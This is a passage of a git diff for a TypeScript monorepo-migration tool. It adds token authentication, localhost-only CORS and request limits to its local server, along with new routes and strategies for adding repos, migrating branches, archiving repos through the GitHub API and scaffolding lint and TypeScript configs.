'node_modules/\ndist/\n.DS_Store\n*.log\n'; - const pmEntries = getGitignoreEntries(pmConfig); - if (pmEntries.length > 0) { - gitignoreContent += '\n# Package manager\n' + pmEntries.join('\n') + '\n'; - } - planFiles.push({ relativePath: '.gitignore', content: gitignoreContent }); - } - - // README - const readmeContent = generateRootReadme( - repoPaths.map((r) => r.name), - packagesDir, - pmConfig, - ); - planFiles.push({ relativePath: 'README.md', content: readmeContent }); - - // Assemble plan - const plan: ApplyPlan = { - version: 1, - sources: repoPaths.map((r) => ({ name: r.name, path: r.path })), - packagesDir, - rootPackageJson: workspaceConfig.rootPackageJson, - files: planFiles, - install: options.install !== false, - installCommand: pmConfig.installCommand, - analysisFindings: depAnalysis.findings, - }; - - // Write plan file await ensureDir(path.dirname(planFilePath)); - await writeJson(planFilePath, plan, { spaces: 2 }); + await writeJson(planFilePath, result.plan, { spaces: 2 }); logger.success('Plan generated successfully'); - return { planPath: planFilePath, plan }; + return { planPath: planFilePath, plan: result.plan }; } // ─── Apply ───────────────────────────────────────────────────────────────── @@ -558,8 +394,8 @@ export async function runApply( if (await pathExists(stagingDir)) { await removeDir(stagingDir); } - } catch { - // Ignore cleanup errors + } catch (err) { + logger.debug?.('Failed to clean up staging dir: ' + (err instanceof Error ? err.message : String(err))); } throw error; } @@ -713,8 +549,8 @@ export async function runPrepare( } finally { try { await removeDir(tempDir); - } catch { - // Ignore cleanup errors + } catch (err) { + logger.debug?.('Failed to clean up temp dir: ' + (err instanceof Error ? err.message : String(err))); } } } diff --git a/src/server/index.ts b/src/server/index.ts index b38766e..323f136 100755 --- a/src/server/index.ts +++ b/src/server/index.ts @@ -1,5 +1,6 @@ import http from 'node:http'; import path from 'node:path'; +import crypto from 'node:crypto'; import express from 'express'; import { WebSocketServer } from 'ws'; import type { ServerOptions } from './types.js'; @@ -13,14 +14,60 @@ import { wizardRoute } from './routes/wizard.js'; import { prepareRoute } from './routes/prepare.js'; import { configureRoute } from './routes/configure.js'; import { archiveRoute } from './routes/archive.js'; +import { addRoute } from './routes/add.js'; +import { migrateBranchRoute } from './routes/migrate-branch.js'; + +export interface ServerResult { + server: http.Server; + token: string; +} /** * Create and start the HTTP + WebSocket server. - * Returns the http.Server so callers can listen on it or close it. + * Returns the http.Server and auth token so callers can display it. */ -export function createServer(options: ServerOptions): http.Server { +export function createServer(options: ServerOptions): ServerResult { const app = express(); - app.use(express.json()); + + // Generate auth token (SEC-03) + const token = crypto.randomBytes(24).toString('hex'); + + // Body size limit (SEC-06) + app.use(express.json({ limit: '50kb' })); + + // CORS - localhost only (SEC-03) + app.use((_req, res, next) => { + const origin = _req.headers.origin; + if (origin) { + const isLocalOrigin = /^https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?$/.test(origin); + if (isLocalOrigin) { + res.setHeader('Access-Control-Allow-Origin', origin); + res.setHeader('Vary', 'Origin'); + } + } + res.setHeader('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE, OPTIONS'); + res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization'); + if (_req.method === 'OPTIONS') { + res.status(204).end(); + return; + } + next(); + }); + + // Auth middleware for API routes (SEC-03) + app.use('/api', (req, res, next) => { + // Allow wizard state endpoint without auth for initial UI load + if (req.path === '/wizard/state' && req.method === 'GET') { + next(); + return; + } + const authHeader = req.headers.authorization; + if (!authHeader || authHeader !== `Bearer ${token}`) { + res.status(401).json({ error: 'Unauthorized. Provide Authorization: Bearer header.' }); + return; + } + next(); + }); const hub = new WsHub(); @@ -34,6 +81,8 @@ export function createServer(options: ServerOptions): http.Server { app.use('/api/prepare', prepareRoute(hub)); app.use('/api/configure', configureRoute(hub)); app.use('/api/archive', archiveRoute(hub)); + app.use('/api/add', addRoute(hub)); + app.use('/api/migrate-branch', migrateBranchRoute(hub)); // Serve static UI assets if available if (options.staticDir) { @@ -47,8 +96,26 @@ export function createServer(options: ServerOptions): http.Server { const server = http.createServer(app); - // WebSocket upgrade - const wss = new WebSocketServer({ server, path: '/ws' }); + // WebSocket upgrade with auth (SEC-03) + const wss = new WebSocketServer({ noServer: true }); + server.on('upgrade', (request, socket, head) => { + // Check token in query string for WebSocket + const url = new URL(request.url || '', `http://${request.headers.host}`); + if (url.pathname !== '/ws') { + socket.destroy(); + return; + } + const wsToken = url.searchParams.get('token'); + if (wsToken !== token) { + socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n'); + socket.destroy(); + return; + } + wss.handleUpgrade(request, socket, head, (ws) => { + wss.emit('connection', ws, request); + }); + }); + wss.on('connection', (ws) => { hub.register(ws); }); @@ -59,7 +126,8 @@ export function createServer(options: ServerOptions): http.Server { wss.close(); }); - server.listen(options.port); + // Bind to loopback by default to avoid exposing the local UI server externally. + server.listen(options.port, options.host ?? '127.0.0.1'); - return server; + return { server, token }; } diff --git a/src/server/routes/add.ts b/src/server/routes/add.ts new file mode 100755 index 0000000..65334fa --- /dev/null +++ b/src/server/routes/add.ts @@ -0,0 +1,58 @@ +import crypto from 'node:crypto'; +import { Router } from 'express'; +import type { WsHub } from '../ws/hub.js'; +import { createWsLogger } from '../ws/logger.js'; +import { generateAddPlan, applyAddPlan } from '../../strategies/add.js'; + +export function addRoute(hub: WsHub): Router { + const router = Router(); + + router.post('/', (req, res) => { + const { repo, targetMonorepo, options } = req.body ?? {}; + + if (!repo || typeof repo !== 'string') { + res.status(400).json({ error: 'Request body must include a "repo" string' }); + return; + } + + if (!targetMonorepo || typeof targetMonorepo !== 'string') { + res.status(400).json({ error: 'Request body must include a "targetMonorepo" string' }); + return; + } + + const opId = crypto.randomUUID(); + hub.createOperation(opId); + res.status(202).json({ opId }); + + const logger = createWsLogger(hub, opId); + + (async () => { + try { + const plan = await generateAddPlan(repo, { + to: targetMonorepo, + packagesDir: options?.packagesDir || 'packages', + conflictStrategy: options?.conflictStrategy || 'highest', + packageManager: options?.packageManager || 'pnpm', + }, logger); + + if (options?.apply) { + await applyAddPlan(plan, logger); + } + + hub.broadcast(opId, { type: 'result', data: plan, opId }); + hub.broadcast(opId, { type: 'done', opId }); + } catch (err) { + hub.broadcast(opId, { + type: 'error', + message: err instanceof Error ? err.message : String(err), + opId, + }); + hub.broadcast(opId, { type: 'done', opId }); + } finally { + hub.scheduleCleanup(opId); + } + })(); + }); + + return router; +} diff --git a/src/server/routes/migrate-branch.ts b/src/server/routes/migrate-branch.ts new file mode 100755 index 0000000..673232b --- /dev/null +++ b/src/server/routes/migrate-branch.ts @@ -0,0 +1,63 @@ +import crypto from 'node:crypto'; +import { Router } from 'express'; +import type { WsHub } from '../ws/hub.js'; +import { createWsLogger } from '../ws/logger.js'; +import { generateBranchPlan, applyBranchPlan } from '../../strategies/migrate-branch.js'; +import type { BranchMigrateStrategy } from '../../types/index.js'; + +export function migrateBranchRoute(hub: WsHub): Router { + const router = Router(); + + router.post('/', (req, res) => { + const { branch, sourceRepo, targetMonorepo, strategy, options } = req.body ?? {}; + + if (!branch || typeof branch !== 'string') { + res.status(400).json({ error: 'Request body must include a "branch" string' }); + return; + } + + if (!sourceRepo || typeof sourceRepo !== 'string') { + res.status(400).json({ error: 'Request body must include a "sourceRepo" string' }); + return; + } + + if (!targetMonorepo || typeof targetMonorepo !== 'string') { + res.status(400).json({ error: 'Request body must include a "targetMonorepo" string' }); + return; + } + + const opId = crypto.randomUUID(); + hub.createOperation(opId); + res.status(202).json({ opId }); + + const logger = createWsLogger(hub, opId); + const migrationStrategy: BranchMigrateStrategy = strategy === 'replay' ? 'replay' : 'subtree'; + + (async () => { + try { + const plan = await generateBranchPlan( + branch, sourceRepo, targetMonorepo, + migrationStrategy, logger, + ); + + if (options?.apply) { + await applyBranchPlan(plan, options?.subdir || plan.sourceRepo, logger); + } + + hub.broadcast(opId, { type: 'result', data: plan, opId }); + hub.broadcast(opId, { type: 'done', opId }); + } catch (err) { + hub.broadcast(opId, { + type: 'error', + message: err instanceof Error ? err.message : String(err), + opId, + }); + hub.broadcast(opId, { type: 'done', opId }); + } finally { + hub.scheduleCleanup(opId); + } + })(); + }); + + return router; +} diff --git a/src/server/types.ts b/src/server/types.ts index e34d334..850e0bd 100755 --- a/src/server/types.ts +++ b/src/server/types.ts @@ -22,6 +22,8 @@ export type WsClientMessage = export interface ServerOptions { /** Port to listen on (0 for OS-assigned) */ port: number; + /** Interface to bind to. Defaults to loopback for local-only access. */ + host?: string; /** Directory containing pre-built UI assets to serve statically */ staticDir?: string; } diff --git a/src/server/wizard-state.ts b/src/server/wizard-state.ts index 9fd1a3b..9d5f69d 100755 --- a/src/server/wizard-state.ts +++ b/src/server/wizard-state.ts @@ -69,7 +69,10 @@ export async function readWizardState(baseDir?: string): Promise { const statePath = getWizardStatePath(baseDir); await ensureDir(path.dirname(statePath)); - const updated = { ...state, updatedAt: new Date().toISOString() }; + const nowMs = Date.now(); + const previousMs = Date.parse(state.updatedAt); + const nextMs = Number.isFinite(previousMs) ? Math.max(nowMs, previousMs + 1) : nowMs; + const updated = { ...state, updatedAt: new Date(nextMs).toISOString() }; await writeJson(statePath, updated, { spaces: 2 }); } diff --git a/src/server/ws/hub.ts b/src/server/ws/hub.ts index 7be2853..0bf16ef 100755 --- a/src/server/ws/hub.ts +++ b/src/server/ws/hub.ts @@ -5,6 +5,15 @@ import type { WsEvent, WsClientMessage } from '../types.js'; * Manages WebSocket connections, operation subscriptions, and event broadcasting. */ export class WsHub { + /** Maximum number of concurrent operations (SEC-06) */ + private static MAX_CONCURRENT = 5; + + /** Maximum buffered events per operation (SEC-06) */ + private static MAX_EVENTS = 1000; + + /** Number of currently active (non-completed) operations */ + private activeCount = 0; + /** Which opIds each client is subscribed to */ private connections = new Map>(); @@ -54,20 +63,30 @@ export class WsHub { /** * Create a new operation and return its AbortController. + * Throws if the maximum concurrent operation limit is reached (SEC-06). */ createOperation(opId: string): AbortController { + if (this.activeCount >= WsHub.MAX_CONCURRENT) { + throw new Error( + `Too many concurrent operations (max ${WsHub.MAX_CONCURRENT}). Try again later.`, + ); + } const controller = new AbortController(); this.operations.set(opId, { controller, events: [] }); + this.activeCount++; return controller; } /** * Broadcast an event to all clients subscribed to its opId, and buffer it. + * The event buffer is capped at MAX_EVENTS per operation to prevent memory exhaustion (SEC-06). */ broadcast(opId: string, event: WsEvent): void { const op = this.operations.get(opId); if (op) { - op.events.push(event); + if (op.events.length < WsHub.MAX_EVENTS) { + op.events.push(event); + } } for (const [ws, subs] of this.connections) { @@ -104,8 +123,14 @@ export class WsHub { /** * Schedule cleanup of a completed operation after a delay. + * Decrements the active operation count since the operation is done. */ scheduleCleanup(opId: string, delayMs = 5 * 60 * 1000): void { + // Decrement active count when operation completes (SEC-06) + if (this.operations.has(opId) && this.activeCount > 0) { + this.activeCount--; + } + const existing = this.cleanupTimers.get(opId); if (existing) clearTimeout(existing); @@ -129,5 +154,6 @@ export class WsHub { this.cleanupTimers.clear(); this.operations.clear(); this.connections.clear(); + this.activeCount = 0; } } diff --git a/src/strategies/add.ts b/src/strategies/add.ts new file mode 100755 index 0000000..4855979 --- /dev/null +++ b/src/strategies/add.ts @@ -0,0 +1,233 @@ +import path from 'node:path'; +import { analyzeDependencies, detectFileCollisions } from '../analyzers/index.js'; +import { detectCircularDependencies, computeHotspots } from '../analyzers/graph.js'; +import { cloneOrCopyRepos } from './copy.js'; +import type { + AddPlan, + AddCommandOptions, + AnalyzeResult, + Logger, + PlanDecision, + PlanOperation, + RepoSource, + CrossDependency, +} from '../types/index.js'; +import { validateRepoSources } from '../utils/validation.js'; +import { readJson, pathExists, listDirs, createTempDir } from '../utils/fs.js'; + +/** + * Analyze an existing monorepo to discover its current packages + */ +async function discoverMonorepoPackages( + monorepoPath: string, + packagesDir: string, +): Promise { + const pkgDir = path.join(monorepoPath, packagesDir); + if (!(await pathExists(pkgDir))) return []; + const dirs = await listDirs(pkgDir); + return dirs; +} + +/** + * Detect cross-dependencies between new repo and existing packages + */ +function detectCrossDeps( + newPkgName: string, + newDeps: Record, + existingPackageNames: string[], +): CrossDependency[] { + const cross: CrossDependency[] = []; + for (const [dep, version] of Object.entries(newDeps)) { + if (existingPackageNames.includes(dep)) { + cross.push({ + fromPackage: newPkgName, + toPackage: dep, + currentVersion: version, + dependencyType: 'dependencies', + }); + } + } + return cross; +} + +/** + * Generate an AddPlan for adding a repository to an existing monorepo + */ +export async function generateAddPlan( + repoInput: string, + options: AddCommandOptions, + logger: Logger, +): Promise { + // Validate source + const validation = await validateRepoSources([repoInput]); + if (!validation.valid) { + throw new Error(`Invalid repository source: ${validation.errors.join(', ')}`); + } + const source: RepoSource = validation.sources[0]; + + // Check target monorepo exists + const monorepoPath = path.resolve(options.to); + if (!(await pathExists(monorepoPath))) { + throw new Error(`Target monorepo does not exist: ${monorepoPath}`); + } + const rootPkgPath = path.join(monorepoPath, 'package.json'); + if (!(await pathExists(rootPkgPath))) { + throw new Error(`No package.json found in monorepo: ${monorepoPath}`); + } + + logger.info(`Analyzing target monorepo at ${monorepoPath}`); + + // Discover existing packages + const existingPkgs = await discoverMonorepoPackages(monorepoPath, options.packagesDir); + logger.info(`Found ${existingPkgs.length} existing packages`); + + // Clone/copy the new repo into temp dir + const tempDir = await createTempDir('monotize-add-'); + logger.info(`Cloning ${source.original}...`); + const clonedRepos = await cloneOrCopyRepos([source], tempDir, { logger }); + const cloned = clonedRepos[0]; + + // Build paths array for analysis + const existingRepoPaths = existingPkgs.map((p) => ({ + path: path.join(monorepoPath, options.packagesDir, p), + name: p, + })); + const allRepoPaths = [...existingRepoPaths, { path: cloned.path, name: cloned.name }]; + + // Analyze + const depAnalysis = await analyzeDependencies(allRepoPaths); + const collisions = await detectFileCollisions([{ path: cloned.path, name: cloned.name }]); + const crossDeps = detectCrossDeps( + cloned.name, + depAnalysis.resolvedDependencies, + existingPkgs, + ); + const circular = detectCircularDependencies(crossDeps); + const hotspots = computeHotspots(depAnalysis.packages, depAnalysis.conflicts); + + // Read new package info + const newPkgJson = (await readJson(path.join(cloned.path, 'package.json'))) as Record< + string, + unknown + >; + const newPkgName = (newPkgJson.name as string) || source.name; + const newDeps = (newPkgJson.dependencies as Record) || {}; + const detailedCrossDeps = detectCrossDeps(newPkgName, newDeps, existingPkgs); + + // Calculate complexity + const complexityScore = Math.min( + 100, + depAnalysis.conflicts.length * 5 + collisions.length * 3 + circular.length * 10, + ); + + const analysis: AnalyzeResult = { + packages: depAnalysis.packages, + conflicts: depAnalysis.conflicts, + collisions, + crossDependencies: detailedCrossDeps, + complexityScore, + recommendations: [], + circularDependencies: circular, + hotspots, + }; + + // Generate decisions from conflicts + const decisions: PlanDecision[] = depAnalysis.conflicts.map((c) => ({ + id: `dep-${c.name}`, + kind: 'version-conflict', + chosen: c.versions[0]?.version ?? 'unknown', + alternatives: c.versions.slice(1).map((v) => v.version), + })); + + // Generate operations + const operations: PlanOperation[] = [ + { + id: 'copy-package', + type: 'copy', + description: `Copy ${source.name} to ${options.packagesDir}/${source.name}`, + inputs: [cloned.path], + outputs: [path.join(options.packagesDir, source.name)], + }, + { + id: 'update-root-pkg', + type: 'write', + description: 'Update root package.json with new workspace references', + inputs: ['package.json'], + outputs: ['package.json'], + }, + { + id: 'update-workspace-config', + type: 'write', + description: 'Update workspace configuration', + inputs: [], + outputs: ['pnpm-workspace.yaml'], + }, + { + id: 'install-deps', + type: 'exec', + description: 'Install dependencies', + inputs: [], + outputs: ['node_modules'], + }, + ]; + + logger.success(`Add plan generated with ${operations.length} operations`); + + return { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: source, + targetMonorepo: monorepoPath, + packagesDir: options.packagesDir, + analysis, + decisions, + operations, + }; +} + +/** + * Apply an AddPlan to an existing monorepo + */ +export async function applyAddPlan( + plan: AddPlan, + logger: Logger, +): Promise<{ success: boolean; packageDir: string }> { + const { targetMonorepo, packagesDir, sourceRepo, operations } = plan; + + // Execute operations + for (const op of operations) { + logger.info(`Executing: ${op.description}`); + + switch (op.type) { + case 'copy': { + const { copyDir, ensureDir } = await import('../utils/fs.js'); + const destDir = path.join(targetMonorepo, packagesDir, sourceRepo.name); + await ensureDir(destDir); + if (op.inputs[0]) { + await copyDir(op.inputs[0], destDir); + } + break; + } + case 'write': { + const rootPkgPath = path.join(targetMonorepo, 'package.json'); + const rootPkg = (await readJson(rootPkgPath)) as Record; + const workspaces = rootPkg.workspaces as string[] | undefined; + if (workspaces && !workspaces.includes(`${packagesDir}/${sourceRepo.name}`)) { + workspaces.push(`${packagesDir}/${sourceRepo.name}`); + workspaces.sort(); + } + const { writeJson } = await import('../utils/fs.js'); + await writeJson(rootPkgPath, rootPkg); + break; + } + case 'exec': { + logger.info('Skipping install step (run manually after reviewing changes)'); + break; + } + } + } + + const packageDir = path.join(targetMonorepo, packagesDir, sourceRepo.name); + logger.success(`Added ${sourceRepo.name} to ${packageDir}`); + return { success: true, packageDir }; +} diff --git a/src/strategies/archive.ts b/src/strategies/archive.ts new file mode 100755 index 0000000..35c3d6d --- /dev/null +++ b/src/strategies/archive.ts @@ -0,0 +1,135 @@ +import type { ArchivePlan, Logger, RepoSource } from '../types/index.js'; +import { validateRepoSources } from '../utils/validation.js'; + +/** + * Generate a README deprecation patch for a single repo. + * This works without any token - it's just text generation. + */ +export function generateReadmeDeprecationPatch( + repoName: string, + monorepoUrl: string, +): string { + const notice = [ + `# ${repoName}`, + '', + `> **Note:** This repository has been migrated to a monorepo.`, + `> All future development happens at [${monorepoUrl}](${monorepoUrl}).`, + '', + '## Migration Notice', + '', + `This repository is **archived** and no longer maintained independently.`, + `The code now lives in the monorepo at:`, + '', + ` ${monorepoUrl}`, + '', + 'Please file issues and submit pull requests there.', + '', + ].join('\n'); + + // Generate unified diff + const lines = [ + `--- a/README.md`, + `+++ b/README.md`, + `@@ -1,1 +1,${notice.split('\n').length} @@`, + ...notice.split('\n').map((l) => `+${l}`), + ]; + + return lines.join('\n'); +} + +/** + * Generate an ArchivePlan for deprecating old repositories + */ +export async function generateArchivePlan( + repoInputs: string[], + monorepoUrl: string, + options: { tokenFromEnv?: boolean } = {}, +): Promise { + const validation = await validateRepoSources(repoInputs); + if (!validation.valid) { + throw new Error(`Invalid repository sources: ${validation.errors.join(', ')}`); + } + + const repos = validation.sources.map((source: RepoSource) => ({ + name: source.name, + url: source.resolved, + readmePatch: generateReadmeDeprecationPatch(source.name, monorepoUrl), + })); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos, + monorepoUrl, + }; + + // Only include API operations if token will be available + if (options.tokenFromEnv) { + plan.apiOperations = validation.sources.map((source: RepoSource) => ({ + repo: source.original, + action: 'archive' as const, + })); + } + + return plan; +} + +/** + * Apply archive operations via the GitHub API. + * Token is read from environment variable only, NEVER persisted. + */ +export async function applyArchiveViaGitHubApi( + plan: ArchivePlan, + logger: Logger, +): Promise<{ applied: string[]; failed: Array<{ repo: string; error: string }> }> { + const token = process.env.GITHUB_TOKEN || process.env.GH_TOKEN; + if (!token) { + throw new Error( + 'GitHub token required. Set GITHUB_TOKEN or GH_TOKEN environment variable.', + ); + } + + const applied: string[] = []; + const failed: Array<{ repo: string; error: string }> = []; + + for (const op of plan.apiOperations ?? []) { + logger.info(`Archiving ${op.repo} via GitHub API...`); + + try { + // Parse owner/repo from the repo string + const match = op.repo.match(/(?:github\.com\/)?([^/]+)\/([^/.]+)/); + if (!match) { + failed.push({ repo: op.repo, error: 'Could not parse owner/repo' }); + continue; + } + const [, owner, repo] = match; + + if (op.action === 'archive') { + const response = await fetch(`https://api.github.com/repos/${owner}/${repo}`, { + method: 'PATCH', + headers: { + Authorization: `Bearer ${token}`, + Accept: 'application/vnd.github+json', + 'X-GitHub-Api-Version': '2022-11-28', + }, + body: JSON.stringify({ archived: true }), + }); + + if (!response.ok) { + const body = await response.text(); + failed.push({ repo: op.repo, error: `HTTP ${response.status}: ${body}` }); + continue; + } + } + + applied.push(op.repo); + logger.success(`Archived ${op.repo}`); + } catch (err: unknown) { + const msg = err instanceof Error ? err.message : String(err); + failed.push({ repo: op.repo, error: msg }); + logger.error(`Failed to archive ${op.repo}: ${msg}`); + } + } + + return { applied, failed }; +} diff --git a/src/strategies/configure.ts b/src/strategies/configure.ts new file mode 100755 index 0000000..e990a04 --- /dev/null +++ b/src/strategies/configure.ts @@ -0,0 +1,260 @@ +import path from 'node:path'; +import type { ConfigPlan, ConfigPatch, Logger } from '../types/index.js'; +import { pathExists, readFile, writeFile, ensureDir } from '../utils/fs.js'; + +export interface ConfigureOptions { + workspaceTool?: 'turbo' | 'nx' | 'none'; + packageManager?: string; +} + +/** + * Generate a ConfigPlan for workspace scaffolding. + * Only generates safe JSON/YAML configs. Flags executable configs as warnings. + */ +export async function generateConfigPlan( + monorepoDir: string, + packageNames: string[], + packagesDir: string, + _options: ConfigureOptions = {}, + logger?: Logger, +): Promise { + const patches: ConfigPatch[] = []; + const warnings: ConfigPlan['warnings'] = []; + + // Scaffold Prettier + const prettierPatches = await scaffoldPrettier(monorepoDir, packageNames, packagesDir); + patches.push(...prettierPatches); + + // Scaffold ESLint + const { patches: eslintPatches, warnings: eslintWarnings } = await scaffoldEslint( + monorepoDir, + packageNames, + packagesDir, + ); + patches.push(...eslintPatches); + warnings.push(...eslintWarnings); + + // Scaffold TypeScript + const tsPatches = await scaffoldTypescript(monorepoDir, packageNames, packagesDir, logger); + patches.push(...tsPatches); + + logger?.info(`ConfigPlan: ${patches.length} patches, ${warnings.length} warnings`); + + return { + schemaVersion: 1, + createdAt: new Date().toISOString(), + patches, + warnings, + }; +} + +/** + * Scaffold Prettier config: root .prettierrc.json + */ +async function scaffoldPrettier( + monorepoDir: string, + _packageNames: string[], + _packagesDir: string, +): Promise { + const patches: ConfigPatch[] = []; + const rootConfig = path.join(monorepoDir, '.prettierrc.json'); + + if (!(await pathExists(rootConfig))) { + const content = JSON.stringify( + { + semi: true, + singleQuote: true, + trailingComma: 'all', + printWidth: 100, + tabWidth: 2, + }, + null, + 2, + ); + patches.push({ + path: '.prettierrc.json', + after: content, + description: 'Root Prettier configuration (JSON, safe to edit)', + }); + } + + // .prettierignore + const ignorePath = path.join(monorepoDir, '.prettierignore'); + if (!(await pathExists(ignorePath))) { + patches.push({ + path: '.prettierignore', + after: 'dist\nnode_modules\ncoverage\n*.min.js\n', + description: 'Prettier ignore file', + }); + } + + return patches; +} + +/** + * Scaffold ESLint config. Only generates JSON configs. + * JS/CJS configs are flagged as warnings. + */ +async function scaffoldEslint( + monorepoDir: string, + packageNames: string[], + packagesDir: string, +): Promise<{ patches: ConfigPatch[]; warnings: ConfigPlan['warnings'] }> { + const patches: ConfigPatch[] = []; + const warnings: ConfigPlan['warnings'] = []; + + // Check for existing JS configs + for (const ext of ['.eslintrc.js', '.eslintrc.cjs', 'eslint.config.js', 'eslint.config.mjs']) { + if (await pathExists(path.join(monorepoDir, ext))) { + warnings.push({ + config: `ESLint (${ext})`, + reason: 'Executable config file cannot be safely auto-merged', + suggestion: 'Manually review and consolidate ESLint configuration', + }); + return { patches, warnings }; + } + } + + // Check per-package for JS configs + for (const pkg of packageNames) { + const pkgDir = path.join(monorepoDir, packagesDir, pkg); + for (const ext of ['.eslintrc.js', '.eslintrc.cjs', 'eslint.config.js', 'eslint.config.mjs']) { + if (await pathExists(path.join(pkgDir, ext))) { + warnings.push({ + config: `ESLint in ${pkg} (${ext})`, + reason: 'Per-package executable ESLint config requires manual review', + suggestion: `Migrate ${pkg}/${ext} to JSON format or consolidate at root`, + }); + } + } + } + + // Generate root JSON config if none exists + const rootConfig = path.join(monorepoDir, '.eslintrc.json'); + if (!(await pathExists(rootConfig))) { + const content = JSON.stringify( + { + root: true, + env: { node: true, es2022: true }, + extends: ['eslint:recommended'], + parserOptions: { ecmaVersion: 'latest', sourceType: 'module' }, + rules: {}, + }, + null, + 2, + ); + patches.push({ + path: '.eslintrc.json', + after: content, + description: 'Root ESLint configuration (JSON, safe to edit)', + }); + } + + return { patches, warnings }; +} + +/** + * Scaffold TypeScript configs: root tsconfig.json with references, + * per-package composite:true. + */ +async function scaffoldTypescript( + monorepoDir: string, + packageNames: string[], + packagesDir: string, + _logger?: Logger, +): Promise { + const patches: ConfigPatch[] = []; + + // Detect which packages have TypeScript + const tsPackages: string[] = []; + for (const pkg of packageNames) { + const pkgTsconfig = path.join(monorepoDir, packagesDir, pkg, 'tsconfig.json'); + if (await pathExists(pkgTsconfig)) { + tsPackages.push(pkg); + } + } + + if (tsPackages.length === 0) return patches; + + // Generate root tsconfig.json with project references + const rootTsconfig = path.join(monorepoDir, 'tsconfig.json'); + if (!(await pathExists(rootTsconfig))) { + const references = tsPackages.map((pkg) => ({ + path: `./${packagesDir}/${pkg}`, + })); + const content = JSON.stringify( + { + compilerOptions: { + target: 'ES2022', + module: 'ESNext', + moduleResolution: 'bundler', + strict: true, + esModuleInterop: true, + skipLibCheck: true, + declaration: true, + declarationMap: true, + sourceMap: true, + composite: true, + }, + references, + files: [], + }, + null, + 2, + ); + patches.push({ + path: 'tsconfig.json', + after: content, + description: 'Root TypeScript configuration with project references', + }); + } + + // Update per-package tsconfig.json to add composite: true + for (const pkg of tsPackages) { + const pkgTsconfigPath = path.join(monorepoDir, packagesDir, pkg, 'tsconfig.json'); + try { + const before = await readFile(pkgTsconfigPath); + const config = JSON.parse(before) as Record; + const compilerOptions = (config.compilerOptions as Record) || {}; + + if (!compilerOptions.composite) { + compilerOptions.composite = true; + config.compilerOptions = compilerOptions; + const after = JSON.stringify(config, null, 2); + patches.push({ + path: `${packagesDir}/${pkg}/tsconfig.json`, + before, + after, + description: `Enable composite mode in ${pkg} for project references`, + }); + } + } catch { + // Skip unparseable tsconfig + } + } + + return patches; +} + +/** + * Apply a ConfigPlan to disk (transactional writes). + */ +export async function applyConfigPlan( + plan: ConfigPlan, + monorepoDir: string, + logger?: Logger, +): Promise { + // Sort patches for deterministic ordering + const sorted = [...plan.patches].sort((a, b) => a.path.localeCompare(b.path)); + + for (const patch of sorted) { + const fullPath = path.join(monorepoDir, patch.path); + await ensureDir(path.dirname(fullPath)); + await writeFile(fullPath, patch.after); + logger?.info(`Wrote ${patch.path}: ${patch.description}`); + } + + for (const warning of plan.warnings) { + logger?.warn(`${warning.config}: ${warning.reason}. ${warning.suggestion}`); + } +} diff --git a/src/strategies/copy.ts b/src/strategies/copy.ts index 678190f..bdcf95c 100755 --- a/src/strategies/copy.ts +++ b/src/strategies/copy.ts @@ -3,6 +3,7 @@ import simpleGit from 'simple-git'; import type { RepoSource, Logger } from '../types/index.js'; import { copyDir, ensureDir, pathExists, removeDir } from '../utils/fs.js'; import { redactUrl } from '../utils/redact.js'; +import { pMap } from '../utils/concurrency.js'; /** * Options for cloning/copying repositories @@ -16,6 +17,10 @@ export interface CopyOptions { cloneTimeout?: number; /** Number of retries for transient failures (default: 3) */ maxRetries?: number; + /** Use shallow clone (--depth 1) for faster cloning. Set to false when preserving history. Default: true */ + shallow?: boolean; + /** Max concurrent clone/copy operations (default: 4) */ + concurrency?: number; } /** @@ -145,9 +150,9 @@ async function cloneRepo( url: string, targetDir: string, logger: Logger, - options: { timeout?: number; maxRetries?: number } = {} + options: { timeout?: number; maxRetries?: number; shallow?: boolean } = {} ): Promise { - const { timeout = 60000, maxRetries = 3 } = options; + const { timeout = 60000, maxRetries = 3, shallow = true } = options; const git = simpleGit({ timeout: { @@ -161,7 +166,8 @@ async function cloneRepo( try { logger.debug(`Cloning ${redactUrl(url)} to ${targetDir} (attempt ${attempt}/${maxRetries})`); - await git.clone(url, targetDir, ['--depth', '1']); + const cloneArgs = shallow ? ['--depth', '1'] : []; + await git.clone(url, targetDir, cloneArgs); logger.debug(`Successfully cloned ${redactUrl(url)}`); return; @@ -207,7 +213,8 @@ async function copyLocalRepo( await copyDir(sourcePath, targetDir, { filter: (src) => { const basename = path.basename(src); - return !EXCLUDE_PATTERNS.includes(basename); + // Exclude known build/tool dirs and macOS resource fork files (._*) + return !EXCLUDE_PATTERNS.includes(basename) && !basename.startsWith('._'); }, }); @@ -222,7 +229,7 @@ export async function cloneOrCopyRepo( targetDir: string, options: CopyOptions ): Promise { - const { logger, cloneTimeout = 60000, maxRetries = 3 } = options; + const { logger, cloneTimeout = 60000, maxRetries = 3, shallow = true } = options; await ensureDir(targetDir); @@ -238,6 +245,7 @@ export async function cloneOrCopyRepo( await cloneRepo(source.resolved, targetDir, logger, { timeout: cloneTimeout, maxRetries, + shallow, }); } } @@ -250,24 +258,27 @@ export async function cloneOrCopyRepos( tempDir: string, options: CopyOptions ): Promise> { - const { logger } = options; - const results: Array<{ path: string; name: string }> = []; - - for (const source of sources) { - const targetDir = path.join(tempDir, source.name); - - logger.info(`Processing ${source.original}...`); - - try { - await cloneOrCopyRepo(source, targetDir, options); - results.push({ path: targetDir, name: source.name }); - logger.success(`Processed ${source.name}`); - } catch (error) { - const message = error instanceof Error ? error.message : String(error); - logger.error(`Failed to process ${source.original}: ${message}`); - throw error; - } - } + const { logger, concurrency = 4 } = options; + + const results = await pMap( + sources, + async (source) => { + const targetDir = path.join(tempDir, source.name); + + logger.info(`Processing ${source.original}...`); + + try { + await cloneOrCopyRepo(source, targetDir, options); + logger.success(`Processed ${source.name}`); + return { path: targetDir, name: source.name }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + logger.error(`Failed to process ${source.original}: ${message}`); + throw error; + } + }, + concurrency, + ); return results; } diff --git a/src/strategies/dependency-enforcement.ts b/src/strategies/dependency-enforcement.ts new file mode 100755 index 0000000..3e8bec0 --- /dev/null +++ b/src/strategies/dependency-enforcement.ts @@ -0,0 +1,176 @@ +import type { + DependencyConflict, + PackageManagerType, + PlanDecision, + PackageInfo, + VerifyCheck, +} from 